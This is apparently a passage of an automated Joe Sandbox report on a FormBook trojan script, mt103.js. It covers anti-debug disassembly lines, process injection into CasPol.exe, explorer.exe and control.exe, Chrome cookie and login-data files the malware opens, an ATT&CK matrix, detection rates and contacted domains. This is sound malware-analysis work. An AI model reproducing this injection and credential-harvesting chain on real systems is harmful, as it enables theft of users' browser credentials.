          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7016 mov eax, dword ptr fs:[00000030h]11_2_010D7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112740D mov eax, dword ptr fs:[00000030h]11_2_0112740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108BC2C mov eax, dword ptr fs:[00000030h]11_2_0108BC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108002D mov eax, dword ptr fs:[00000030h]11_2_0108002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B02A mov eax, dword ptr fs:[00000030h]11_2_0106B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A44B mov eax, dword ptr fs:[00000030h]11_2_0108A44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01070050 mov eax, dword ptr fs:[00000030h]11_2_01070050
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01070050 mov eax, dword ptr fs:[00000030h]11_2_01070050
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EC450 mov eax, dword ptr fs:[00000030h]11_2_010EC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EC450 mov eax, dword ptr fs:[00000030h]11_2_010EC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01112073 mov eax, dword ptr fs:[00000030h]11_2_01112073
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01121074 mov eax, dword ptr fs:[00000030h]11_2_01121074
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107746D mov eax, dword ptr fs:[00000030h]11_2_0107746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059080 mov eax, dword ptr fs:[00000030h]11_2_01059080
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D3884 mov eax, dword ptr fs:[00000030h]11_2_010D3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D3884 mov eax, dword ptr fs:[00000030h]11_2_010D3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106849B mov eax, dword ptr fs:[00000030h]11_2_0106849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010990AF mov eax, dword ptr fs:[00000030h]11_2_010990AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov ecx, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov eax, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108F0BF mov eax, dword ptr fs:[00000030h]11_2_0108F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128CD6 mov eax, dword ptr fs:[00000030h]11_2_01128CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov ecx, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EB8D0 mov eax, dword ptr fs:[00000030h]11_2_010EB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_011114FB mov eax, dword ptr fs:[00000030h]11_2_011114FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D6CF0 mov eax, dword ptr fs:[00000030h]11_2_010D6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A70E mov eax, dword ptr fs:[00000030h]11_2_0108A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A70E mov eax, dword ptr fs:[00000030h]11_2_0108A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0111131B mov eax, dword ptr fs:[00000030h]11_2_0111131B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107F716 mov eax, dword ptr fs:[00000030h]11_2_0107F716
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFF10 mov eax, dword ptr fs:[00000030h]11_2_010EFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFF10 mov eax, dword ptr fs:[00000030h]11_2_010EFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112070D mov eax, dword ptr fs:[00000030h]11_2_0112070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0112070D mov eax, dword ptr fs:[00000030h]11_2_0112070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01054F2E mov eax, dword ptr fs:[00000030h]11_2_01054F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01054F2E mov eax, dword ptr fs:[00000030h]11_2_01054F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108E730 mov eax, dword ptr fs:[00000030h]11_2_0108E730
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105DB40 mov eax, dword ptr fs:[00000030h]11_2_0105DB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106EF40 mov eax, dword ptr fs:[00000030h]11_2_0106EF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128B58 mov eax, dword ptr fs:[00000030h]11_2_01128B58
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105F358 mov eax, dword ptr fs:[00000030h]11_2_0105F358
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105DB60 mov ecx, dword ptr fs:[00000030h]11_2_0105DB60
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106FF60 mov eax, dword ptr fs:[00000030h]11_2_0106FF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01083B7A mov eax, dword ptr fs:[00000030h]11_2_01083B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01083B7A mov eax, dword ptr fs:[00000030h]11_2_01083B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128F6A mov eax, dword ptr fs:[00000030h]11_2_01128F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01061B8F mov eax, dword ptr fs:[00000030h]11_2_01061B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01061B8F mov eax, dword ptr fs:[00000030h]11_2_01061B8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110D380 mov ecx, dword ptr fs:[00000030h]11_2_0110D380
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01068794 mov eax, dword ptr fs:[00000030h]11_2_01068794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108B390 mov eax, dword ptr fs:[00000030h]11_2_0108B390
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D7794 mov eax, dword ptr fs:[00000030h]11_2_010D7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0111138A mov eax, dword ptr fs:[00000030h]11_2_0111138A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01125BA5 mov eax, dword ptr fs:[00000030h]11_2_01125BA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010803E2 mov eax, dword ptr fs:[00000030h]11_2_010803E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010937F5 mov eax, dword ptr fs:[00000030h]11_2_010937F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105C600 mov eax, dword ptr fs:[00000030h]11_2_0105C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01088E00 mov eax, dword ptr fs:[00000030h]11_2_01088E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01068A0A mov eax, dword ptr fs:[00000030h]11_2_01068A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105AA16 mov eax, dword ptr fs:[00000030h]11_2_0105AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105AA16 mov eax, dword ptr fs:[00000030h]11_2_0105AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A61C mov eax, dword ptr fs:[00000030h]11_2_0108A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108A61C mov eax, dword ptr fs:[00000030h]11_2_0108A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01073A1C mov eax, dword ptr fs:[00000030h]11_2_01073A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105E620 mov eax, dword ptr fs:[00000030h]11_2_0105E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110FE3F mov eax, dword ptr fs:[00000030h]11_2_0110FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01059240 mov eax, dword ptr fs:[00000030h]11_2_01059240
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01067E41 mov eax, dword ptr fs:[00000030h]11_2_01067E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010E4257 mov eax, dword ptr fs:[00000030h]11_2_010E4257
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106766D mov eax, dword ptr fs:[00000030h]11_2_0106766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110B260 mov eax, dword ptr fs:[00000030h]11_2_0110B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110B260 mov eax, dword ptr fs:[00000030h]11_2_0110B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128A62 mov eax, dword ptr fs:[00000030h]11_2_01128A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109927A mov eax, dword ptr fs:[00000030h]11_2_0109927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107AE73 mov eax, dword ptr fs:[00000030h]11_2_0107AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010EFE87 mov eax, dword ptr fs:[00000030h]11_2_010EFE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108D294 mov eax, dword ptr fs:[00000030h]11_2_0108D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108D294 mov eax, dword ptr fs:[00000030h]11_2_0108D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010552A5 mov eax, dword ptr fs:[00000030h]11_2_010552A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010D46A7 mov eax, dword ptr fs:[00000030h]11_2_010D46A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106AAB0 mov eax, dword ptr fs:[00000030h]11_2_0106AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106AAB0 mov eax, dword ptr fs:[00000030h]11_2_0106AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108FAB0 mov eax, dword ptr fs:[00000030h]11_2_0108FAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128ED6 mov eax, dword ptr fs:[00000030h]11_2_01128ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010836CC mov eax, dword ptr fs:[00000030h]11_2_010836CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01098EC7 mov eax, dword ptr fs:[00000030h]11_2_01098EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110FEC0 mov eax, dword ptr fs:[00000030h]11_2_0110FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010676E2 mov eax, dword ptr fs:[00000030h]11_2_010676E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010816E0 mov ecx, dword ptr fs:[00000030h]11_2_010816E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01082AE4 mov eax, dword ptr fs:[00000030h]11_2_01082AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe, Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 9_2_0040CF93 LdrLoadDll
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\wscript.exe, File created: HBhG[1].exe.0.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1380000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EAA008
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\control.exe, Thread register set: target process: 3452
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\HBhG.exe "C:\Users\user\AppData\Local\Temp\HBhG.exe"
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: explorer.exe, 0000000A.00000002.786777732.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Queries volume information: C:\Users\user\AppData\Local\Temp\HBhG.exe VolumeInformation
          Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\control.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\control.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

          Remote Access Functionality

          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | 42 Scripting | Path Interception | 812 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 42 Scripting | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 5 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 15 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 13 Software Packing | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Timestomp | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
          | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 812 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
          [Behavior graph (ID 794331): sample mt103.js, start date 30/01/2023, architecture WINDOWS, score 100. Process chain: wscript.exe (drops HBhG.exe) -> HBhG.exe -> CasPol.exe -> explorer.exe (injected) -> control.exe.]

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | mt103.js | 23% | ReversingLabs | Script-JS.Trojan.FormBook |
          | mt103.js | 29% | Virustotal | |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Users\user\AppData\Local\Temp\HBhG.exe | 100% | Avira | HEUR/AGEN.1203876 |
          | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe | 100% | Avira | HEUR/AGEN.1203876 |
          | C:\Users\user\AppData\Local\Temp\HBhG.exe | 100% | Joe Sandbox ML | |
          | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe | 100% | Joe Sandbox ML | |
          | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook |
          | C:\Users\user\AppData\Local\Temp\HBhG.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 9.2.CasPol.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 8.0.HBhG.exe.8a0000.0.unpack | 100% | Avira | HEUR/AGEN.1203876 |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | hvlandscapes.biz | 1% | Virustotal | |
          | hirosguide.hu | 14% | Virustotal | |
          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 794331
          Start date and time: 2023-01-30 13:37:38 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 13m 56s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 14
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample file name: mt103.js
          Detection: MAL
          Classification: mal100.troj.spyw.evad.winJS@9/4@21/15
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 69.6% (good quality ratio 62.2%)
          • Quality average: 69.2%
          • Quality standard deviation: 33.1%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 108
          • Number of non-executed functions: 83
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Override analysis time to 240s for JS/VBS files not yet terminated
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          | Time | Type | Description |
          |---|---|---|
          | 13:39:24 | API Interceptor | 1x Sleep call for process: HBhG.exe modified |
